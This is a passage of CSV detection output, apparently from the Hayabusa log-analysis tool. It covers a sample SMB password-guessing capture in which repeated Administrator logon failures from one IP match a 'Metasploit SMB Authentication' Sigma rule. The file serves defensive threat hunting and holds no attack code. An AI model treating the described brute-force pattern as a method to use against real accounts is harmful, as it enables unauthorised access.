Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.414 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Pveyo4Czx6KWKCGn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.414 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zPyyHaRnBec7Qg2x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.453 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V3b8mudJp5mdkiEW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.486 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7Y6mjLaCzR28Q2qK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.524 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.563 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dMsNKWEjeCYYQVqw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.563 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I7c5fENhkwO6QfEU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.605 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Cr1wAeMhPgVpwV82 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.648 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.692 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fErpp9Ww6LO37C9k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.692 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CYsNpBsGT5zOKe3p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.728 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.866 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sgzUk1Dmttm4AQ3s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.866 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Hp0c3YYyOSJuBHCR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.921 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gkis4H1MIQPHUwqf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.965 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Lb6mH03qKLb8O7Dz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.009 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J10xEmhRNWfJ5FCI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.051 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5Dujj8A7wwzAwzCp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.093 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NVDE3fIoUQfLn3cd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.128 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.175 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UlD48O0XpFUnuSmo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.175 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.213 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KyTPKuspADmLpv0L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.213 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BdIAPiH32ZbmCgTK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.260 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1dEiN2xOA4E9Wl5p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.292 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fBeAez2fLjXB0dk3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.337 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gQ45aeMDc3Snabvv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.372 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QWSYdr4lJlhCLMMW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.420 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RgxHY7072aUCdfa0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.462 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9yKhEodJDTVCGdIG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.504 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z0odyPQmvkGRNWZF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.597 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.630 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b5uRpG0fxCK75DPV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.630 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d9dcEzpJRW5YA8Bj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.666 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Hv3B9bwB1YIaBa6N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.712 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.743 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lJf9Obml4aVxE5zp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.743 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mvnSOaRSkGU6Uf5q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.776 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.808 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JSAkZsZsv0SaLKaO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.808 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.847 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r6rnM6QbwfbbrcGy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.847 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RX0GW7K5wdQJUx4Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.888 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xm7CpD5i735McsvS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.920 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.959 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bHxjZsnR25J47Ez8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.959 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.999 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J1JWj91m79FyykH6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.999 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.043 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h9i0GncOzpz5REWp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.043 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BODZRJ6G3xxw29VJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.085 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SJ2lq4piINfmI7Qe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.127 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.167 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NqDeXdOitJ3WY8w4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.167 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FnoHQf7QDxoI4tel : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.217 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.261 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FqkbgrtBa5VFxPry : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.261 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TMD57GtY15bfWBre : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.300 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.350 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e3lT9UgWr82PcAjf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.350 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SpwhTfFlvvccnI5N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.388 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 10CfKdnvWf4UVuME : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.432 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 